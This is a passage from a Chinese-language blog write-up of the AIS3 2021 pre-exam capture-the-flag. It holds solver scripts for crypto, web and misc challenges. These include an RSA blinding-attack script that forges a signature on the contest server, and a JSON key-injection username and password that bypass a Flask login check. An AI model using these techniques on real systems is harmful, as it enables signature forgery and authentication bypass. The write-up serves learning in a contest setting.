</span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>                                                                    ;}

</code></pre></div><p>一個Block是四個字元，Key 被重複使用</p>
<p>因為加密過程只用到mod 96底下的加減法，解密過程很容易寫出來</p>
<p>然後我們大概可以猜到明文的前四個字元會是AIS3</p>
<p>所以把Key爆搜出來再拿去解密就好了</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
cipher <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;=Js&amp;;*A`odZHi&#39;&gt;D=Js&amp;#i-DYf&gt;Uy&#39;yuyfyu&lt;)Gu&#34;</span>

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">brutekeys</span>(p, c):
    keys <span style="color:#f92672">=</span> []
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">4</span>):
        <span style="color:#66d9ef">for</span> key <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">96</span>):
            <span style="color:#66d9ef">if</span> ((ord(p[i])<span style="color:#f92672">-</span><span style="color:#ae81ff">32</span>) <span style="color:#f92672">+</span> key) <span style="color:#f92672">%</span> <span style="color:#ae81ff">96</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">32</span> <span style="color:#f92672">==</span> ord(c[<span style="color:#ae81ff">3</span><span style="color:#f92672">-</span>i]):
                keys<span style="color:#f92672">.</span>append(key)
    <span style="color:#66d9ef">return</span> keys

<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">dec</span>(cipher, keys):
    plain <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
    <span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">4</span>):
        plain <span style="color:#f92672">+=</span> chr(((ord(cipher[<span style="color:#ae81ff">3</span><span style="color:#f92672">-</span>i])<span style="color:#f92672">-</span><span style="color:#ae81ff">32</span>) <span style="color:#f92672">-</span> keys[i]) <span style="color:#f92672">%</span> <span style="color:#ae81ff">96</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">32</span>)
    <span style="color:#66d9ef">return</span> plain

keys <span style="color:#f92672">=</span> brutekeys(<span style="color:#e6db74">&#39;AIS3&#39;</span>, cipher[<span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">4</span>])
flag <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>
<span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(len(cipher)<span style="color:#f92672">//</span><span style="color:#ae81ff">4</span>):
    flag <span style="color:#f92672">+=</span> dec(cipher[<span style="color:#ae81ff">4</span><span style="color:#f92672">*</span>i:<span style="color:#ae81ff">4</span><span style="color:#f92672">*</span>(i<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>)], keys)
<span style="color:#66d9ef">print</span>(flag)
</code></pre></div><p><code>AIS3{w31c0me_t0_AIS3_cryptoO0O0o0Ooo0}</code></p>
<hr>
<h2 id="resident-evil-village">
  ReSident evil villAge
  <a class="heading-link" href="#resident-evil-village">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>簡單來說就是用RSA幫你簽任意字串(blind signing)</p>
<p>但是不會幫你簽&quot;Ethan Winters&rdquo;</p>
<p>我們需要偽造一份用server的私鑰簽&quot;Ethan Winters&quot;的數位簽證</p>
<p>做到的話就給Flag</p>
<p>題目主要邏輯：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">	<span style="color:#66d9ef">if</span> option <span style="color:#f92672">==</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;1&#39;</span>: <span style="color:#75715e"># Sign a message</span>
		self<span style="color:#f92672">.</span>request<span style="color:#f92672">.</span>sendall(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Name (in hex): &#39;</span>)
		msg <span style="color:#f92672">=</span> unhexlify(self<span style="color:#f92672">.</span>recv())
		<span style="color:#66d9ef">if</span> msg <span style="color:#f92672">==</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Ethan Winters&#39;</span> <span style="color:#f92672">or</span> bytes_to_long(msg) <span style="color:#f92672">&gt;=</span> n:  <span style="color:#75715e"># msg+k*n not allowed</span>
			self<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Nice try!&#39;</span>)
		<span style="color:#66d9ef">else</span>:
			sig <span style="color:#f92672">=</span> pow(bytes_to_long(msg), privkey<span style="color:#f92672">.</span>d, n)
            <span style="color:#75715e"># TODO: Apply hashing first to prevent forgery</span>
			self<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Signature: &#39;</span> <span style="color:#f92672">+</span> str(sig)<span style="color:#f92672">.</span>encode())

	<span style="color:#66d9ef">elif</span> option <span style="color:#f92672">==</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;2&#39;</span>: <span style="color:#75715e"># Verify a signed message</span>
		self<span style="color:#f92672">.</span>request<span style="color:#f92672">.</span>sendall(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Signature: &#39;</span>)
		sig <span style="color:#f92672">=</span> int(self<span style="color:#f92672">.</span>recv())
		verified <span style="color:#f92672">=</span> (pow(sig, e, n) <span style="color:#f92672">==</span> bytes_to_long(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Ethan Winters&#39;</span>))
		<span style="color:#66d9ef">if</span> verified:
			self<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;AIS3{THIS_IS_A_FAKE_FLAG}&#39;</span>)
		<span style="color:#66d9ef">else</span>:
			self<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Well done!&#39;</span>)
</code></pre></div><p>官方還很好心在TODO那個地方放一個提示</p>
<p>數位簽證應該要簽明文的Hash而不是明文本身</p>
<p>再加上我們有一定程度的Blind Signing</p>
<p>可以用<a href="https://masterpessimistaa.wordpress.com/2017/07/10/blinding-attack-on-rsa-digital-signatures/">Blinding Attack</a>偽造簽證</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#75715e">#!/usr/bin/env python3</span>
<span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
<span style="color:#f92672">from</span> Crypto.Util.number <span style="color:#f92672">import</span> bytes_to_long, inverse

context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span>

p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#39;quiz.ais3.org&#39;</span>, <span style="color:#ae81ff">42069</span>)
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;n = &#39;</span>)
n <span style="color:#f92672">=</span> int(p<span style="color:#f92672">.</span>recvline())
e <span style="color:#f92672">=</span> <span style="color:#ae81ff">65537</span>
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;3) exit</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)

r <span style="color:#f92672">=</span> <span style="color:#ae81ff">1337</span> <span style="color:#75715e"># blinding factor, can be anything</span>
m <span style="color:#f92672">=</span> bytes_to_long(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;Ethan Winters&#39;</span>)
M <span style="color:#f92672">=</span> (pow(r, e, n) <span style="color:#f92672">*</span> m ) <span style="color:#f92672">%</span> n    <span style="color:#75715e"># M === (r^e) * m mod n</span>
p<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">&#39;1&#39;</span>)                <span style="color:#75715e"># sign M</span>
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;(in hex): &#39;</span>)
p<span style="color:#f92672">.</span>sendline(hex(M)[<span style="color:#ae81ff">2</span>:])
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;Signature: &#39;</span>)
S <span style="color:#f92672">=</span> int(p<span style="color:#f92672">.</span>recvline())          <span style="color:#75715e"># S === M^d mod n</span>

s <span style="color:#f92672">=</span> (S <span style="color:#f92672">*</span> inverse(r, n)) <span style="color:#f92672">%</span> n    <span style="color:#75715e"># s is the fake signature we want</span>
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;3) exit</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#39;</span>)

p<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">&#39;2&#39;</span>)                <span style="color:#75715e"># verify with s</span>
p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">&#39;Signature: &#39;</span>)
p<span style="color:#f92672">.</span>sendline(str(s))
p<span style="color:#f92672">.</span>interactive()
</code></pre></div><p><code>AIS3{R3M383R_70_HAsh_7h3_M3Ssa93_83F0r3_S19N1N9}</code></p>
<hr>
<h1 id="web">
  WEB
  <a class="heading-link" href="#web">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<h2 id="yet-another-login-page">
  Yet Another Login Page
  <a class="heading-link" href="#yet-another-login-page">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目有給Source，是後端用Flask寫的登入頁面：</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">from</span> flask <span style="color:#f92672">import</span> Flask, request, make_response, redirect, session, render_template, send_file
<span style="color:#f92672">import</span> os
<span style="color:#f92672">import</span> json

app <span style="color:#f92672">=</span> Flask(__name__)
app<span style="color:#f92672">.</span>secret_key <span style="color:#f92672">=</span> os<span style="color:#f92672">.</span>urandom(<span style="color:#ae81ff">32</span>)

FLAG <span style="color:#f92672">=</span> os<span style="color:#f92672">.</span>environ<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;FLAG&#39;</span>, <span style="color:#e6db74">&#39;AIS3{TEST_FLAG}&#39;</span>)
users_db <span style="color:#f92672">=</span> {
    <span style="color:#e6db74">&#39;guest&#39;</span>: <span style="color:#e6db74">&#39;guest&#39;</span>,
    <span style="color:#e6db74">&#39;admin&#39;</span>: os<span style="color:#f92672">.</span>environ<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;PASSWORD&#39;</span>, <span style="color:#e6db74">&#39;S3CR3T_P455W0RD&#39;</span>)
}

<span style="color:#a6e22e">@app.route</span>(<span style="color:#e6db74">&#34;/&#34;</span>)
<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">index</span>():
    <span style="color:#66d9ef">def</span> <span style="color:#a6e22e">valid_user</span>(user):
        <span style="color:#66d9ef">return</span> users_db<span style="color:#f92672">.</span>get(user[<span style="color:#e6db74">&#39;username&#39;</span>]) <span style="color:#f92672">==</span> user[<span style="color:#e6db74">&#39;password&#39;</span>]

    <span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#39;user_data&#39;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> session:
        <span style="color:#66d9ef">return</span> render_template(<span style="color:#e6db74">&#34;login.html&#34;</span>, message<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Login Please :D&#34;</span>)

    user <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>loads(session[<span style="color:#e6db74">&#39;user_data&#39;</span>])
    <span style="color:#66d9ef">if</span> valid_user(user):
        <span style="color:#66d9ef">if</span> user[<span style="color:#e6db74">&#39;showflag&#39;</span>] <span style="color:#f92672">==</span> True <span style="color:#f92672">and</span> user[<span style="color:#e6db74">&#39;username&#39;</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;guest&#39;</span>:
            <span style="color:#66d9ef">return</span> FLAG
        <span style="color:#66d9ef">else</span>:
            <span style="color:#66d9ef">return</span> render_template(<span style="color:#e6db74">&#34;welcome.html&#34;</span>, username<span style="color:#f92672">=</span>user[<span style="color:#e6db74">&#39;username&#39;</span>])

    <span style="color:#66d9ef">return</span> render_template(<span style="color:#e6db74">&#34;login.html&#34;</span>, message<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Verify Failed :(&#34;</span>)


<span style="color:#a6e22e">@app.route</span>(<span style="color:#e6db74">&#34;/login&#34;</span>, methods<span style="color:#f92672">=</span>[<span style="color:#e6db74">&#39;POST&#39;</span>])
<span style="color:#66d9ef">def</span> <span style="color:#a6e22e">login</span>():
    data <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;{&#34;showflag&#34;: false, &#34;username&#34;: &#34;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#34;, &#34;password&#34;: &#34;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#34;}&#39;</span> <span style="color:#f92672">%</span> (
        request<span style="color:#f92672">.</span>form[<span style="color:#e6db74">&#34;username&#34;</span>], request<span style="color:#f92672">.</span>form[<span style="color:#e6db74">&#39;password&#39;</span>]
    )
    session[<span style="color:#e6db74">&#39;user_data&#39;</span>] <span style="color:#f92672">=</span> data
    <span style="color:#66d9ef">return</span> redirect(<span style="color:#e6db74">&#34;/&#34;</span>)
</code></pre></div><p>在login()可以看到POST Request裡面的username和password直接被塞進一個JSON物件，然後在index()裡面進行驗證，我們需要通過<code>valid_user(user)</code>以及<code>user['showflag'] == True and user['username'] != 'guest'</code> 這兩個test。</p>
<p>接下來就是嘗試各種 username 和 password 組合</p>
<p>主要想法是在data裡面注入重複的key來覆寫原本的value</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> json
<span style="color:#f92672">import</span> os

users_db <span style="color:#f92672">=</span> {
    <span style="color:#e6db74">&#39;guest&#39;</span> : <span style="color:#e6db74">&#39;guest&#39;</span>,
    <span style="color:#e6db74">&#39;admin&#39;</span>: os<span style="color:#f92672">.</span>environ<span style="color:#f92672">.</span>get(<span style="color:#e6db74">&#39;PASSWORD&#39;</span>, <span style="color:#e6db74">&#39;S3CR3T_P455W0RD&#39;</span>)
}

username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;x2w&#34;, &#34;showflag&#34;: true, &#34;foo&#34;:&#34;&#39;</span>
password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#34;, &#34;password&#34;: null, &#34;foo&#34;:&#34;&#39;</span>

data <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;{&#34;showflag&#34;: false, &#34;username&#34;: &#34;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#34;, &#34;password&#34;: &#34;</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#34;}&#39;</span> <span style="color:#f92672">%</span> (
    username, password
)
user <span style="color:#f92672">=</span> json<span style="color:#f92672">.</span>loads(data)

<span style="color:#66d9ef">if</span> users_db<span style="color:#f92672">.</span>get(user[<span style="color:#e6db74">&#39;username&#39;</span>]) <span style="color:#f92672">==</span> user[<span style="color:#e6db74">&#39;password&#39;</span>]:
    <span style="color:#66d9ef">if</span> user[<span style="color:#e6db74">&#39;showflag&#39;</span>] <span style="color:#f92672">==</span> True <span style="color:#f92672">and</span> user[<span style="color:#e6db74">&#39;username&#39;</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#39;guest&#39;</span>:
        <span style="color:#66d9ef">print</span>(<span style="color:#e6db74">&#34;SUCCESS&#34;</span>) <span style="color:#75715e"># bypass checks</span>
</code></pre></div><p>這樣子的user物件會是</p>
<p><code>{'showflag': True, 'username': 'x2w', 'foo': '', 'password': None}</code></p>
<p>在第一個test的結果是<code>None == None</code>，這在Python裡面是True</p>
<p>第二個test也會通過，showflag 和 username 都被覆寫過了</p>
<p>拿到Flag <code>AIS3{/r/badUIbattles?!?!}</code></p>
<hr>
<h1 id="misc">
  MISC
  <a class="heading-link" href="#misc">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<h2 id="microcheese">
  Microcheese
  <a class="heading-link" href="#microcheese">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>這題原本是Crypto的某題，因為邏輯寫爛了有莫名其妙的解法而被歸類到Misc來。</p>
<p>連到server讓你和電腦玩<a href="https://en.wikipedia.org/wiki/Nim">Nim Game</a>，</p>
<p>可以除存遊戲並且再載入。(以Hash的形式)</p>
<p>贏了就給Flag，當然生成的每一局都是電腦必贏。</p>
<figure><img src="/img/ais3_2021/pre_exam/microcheese01.png"/>
</figure>

<p>原本在遊戲裡應該只有三種操作：</p>
<ol start="0">
<li>make a move</li>
<li>save the current game and leave</li>
<li>resign the game</li>
</ol>
<p>但是因為最後一個判斷停在<code>elif</code>而不是<code>else</code>，我們可以輸入3, 4, 5&hellip;之類的</p>
<p>可以繼續下棋還不會crash</p>
<figure><img src="/img/ais3_2021/pre_exam/microcheese02.png"/>
</figure>

<p>搞到最後變成是一局我們可以贏的Nim Game&hellip;</p>
<p><code>AIS3{5._e3_b5_6._a4_Bb4_7._Bd2_a5_8._axb5_Bxc3}</code></p>
<p>原本的題目好像是要找Hash的漏洞然後讓它載入一局我們必贏的Nim Game?</p>
<p>可惜我太菜不懂Hash</p>
<hr>
<h2 id="blind">
  Blind
  <a class="heading-link" href="#blind">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>題目Source:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;unistd.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;fcntl.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;sys/syscall.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> syscall_black_list[] <span style="color:#f92672">=</span> {};

<span style="color:#66d9ef">void</span> <span style="color:#a6e22e">make_a_syscall</span>()
{
    <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">long</span> <span style="color:#66d9ef">long</span> rax, rdi, rsi, rdx;
    scanf(<span style="color:#e6db74">&#34;%llu %llu %llu %llu&#34;</span>, <span style="color:#f92672">&amp;</span>rax, <span style="color:#f92672">&amp;</span>rdi, <span style="color:#f92672">&amp;</span>rsi, <span style="color:#f92672">&amp;</span>rdx);
    syscall(rax, rdi, rsi, rdx);
}

<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>()
{
    setvbuf(stdin, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0</span>);
    setvbuf(stdout, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">2</span>, <span style="color:#ae81ff">0</span>);
    puts(<span style="color:#e6db74">&#34;You can call a system call, then I will open the flag for you.&#34;</span>);
    puts(<span style="color:#e6db74">&#34;Input: [rax] [rdi] [rsi] [rdx]&#34;</span>);
    close(<span style="color:#ae81ff">1</span>);
    make_a_syscall();
    <span style="color:#66d9ef">int</span> fd <span style="color:#f92672">=</span> open(<span style="color:#e6db74">&#34;flag&#34;</span>, O_RDONLY);
    <span style="color:#66d9ef">char</span> flag[<span style="color:#ae81ff">0x100</span>];
    size_t flag_len <span style="color:#f92672">=</span> read(fd, flag, <span style="color:#ae81ff">0xff</span>);
    write(<span style="color:#ae81ff">1</span>, flag, flag_len);
    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
}
</code></pre></div><p><code>close(1)</code>之後再把Flag 印到 stdout，當然看不到。</p>
<p>上網爬了一堆文之後找到<a href="https://stackoverflow.com/questions/9084099/re-opening-stdout-and-stdin-file-descriptors-after-closing-them/9084222">這篇</a></p>
<p>發現File Descriptor居然可以透過特定的syscall複製一份?</p>
<p>用<code>make_a_syscall(33, 2, 1, 0)</code>讓Flag從stderr跑出來：</p>
<p><code>AIS3{dupppppqqqqqub}</code></p>
<p>又學到了一個這輩子大概不會再用到的syscall</p>
<hr>
<h2 id="cat-slayer-fake">
  Cat Slayer <em>Fake</em>
  <a class="heading-link" href="#cat-slayer-fake">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h2>
<p>就是一個密碼鎖，好像有13位來著？每一位都是0-9</p>
<p>因為每次輸入都能知道自己的密碼到目前為止正確還錯誤</p>
<p>所以這個鎖是 <code>O(10*n)</code> 而不是 <code>O(10^n)</code></p>
<p>然後因為這個鎖的界面是用ncurses之類的東東寫的而不是傳統的CLI</p>
<p>我還真的不會寫pwntools自動化XD</p>
<p>我記得好像是在解Reverse解到精神渙散的時候來按一按，當作腦部復健。</p>
<p>忘記去紀錄Flag是什麼了，然後這題最後好像從Misc搬到Welcome這個奇妙的類別去了</p>
<p>欸以後Welcome多出幾題阿，我會努力去解的。</p>
<hr>
<h1 id="結果與心得">
  結果與心得
  <a class="heading-link" href="#%e7%b5%90%e6%9e%9c%e8%88%87%e5%bf%83%e5%be%97">
    <i class="fa fa-link" aria-hidden="true"></i>
  </a>
</h1>
<p>再次體會到自己很菜</p>
<p>然後第一次寫writeup就已經累到不想再寫第二次了。</p>
<figure><img src="/img/ais3_2021/pre_exam/pre_exam_score.png"/>
</figure>

<ol start="0">
<li>
<p>REVERSE 就是地獄，每次看到新的題形都會很想死，不過做過一次後通常就會覺的類似的題形很簡單了，相當吃經驗的領域。</p>
</li>
<li>
<p>PWN 該學UAF和Heap Exploits了，不然每次都只能解水題，話說今年怎麼好像沒看到Format String?然後Noper居然還是這次解的題目裡分數最高的&hellip;比殺了我好多腦細胞的Colors分數還高到底是怎麼回事？PWN真香。</p>
</li>
<li>
<p>CRYPTO 我真的有夠菜，解不出來只能在路邊CRY</p>
</li>
<li>
<p>WEB 到底哪裡好入門了，到底是誰說很好入門的？</p>
</li>
</ol>
<p>最後一天一題都沒解出來，當天還砸了六個小時在某題Reverse上。明明就只差最後一小步了&hellip;不過沒解出來就是沒解出來，只能眼睜睜看著自己從前二十名掉到第四十&hellip;</p>

      </div>


      <footer>
        


        
        
        
      </footer>
    </article>

    
  </section>

      </div>

      

    </main>

    
      
      <script src="/js/coder.min.235666b114443867d43eeb5799d51f6252965e5163f338285e113fa381d3d27e.js" integrity="sha256-I1ZmsRREOGfUPutXmdUfYlKWXlFj8zgoXhE/o4HT0n4="></script>
    

    

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-197567679-1', 'auto');
	
	ga('send', 'pageview');
}
</script>

    

    

    

    

    

    
  </body>

</html>
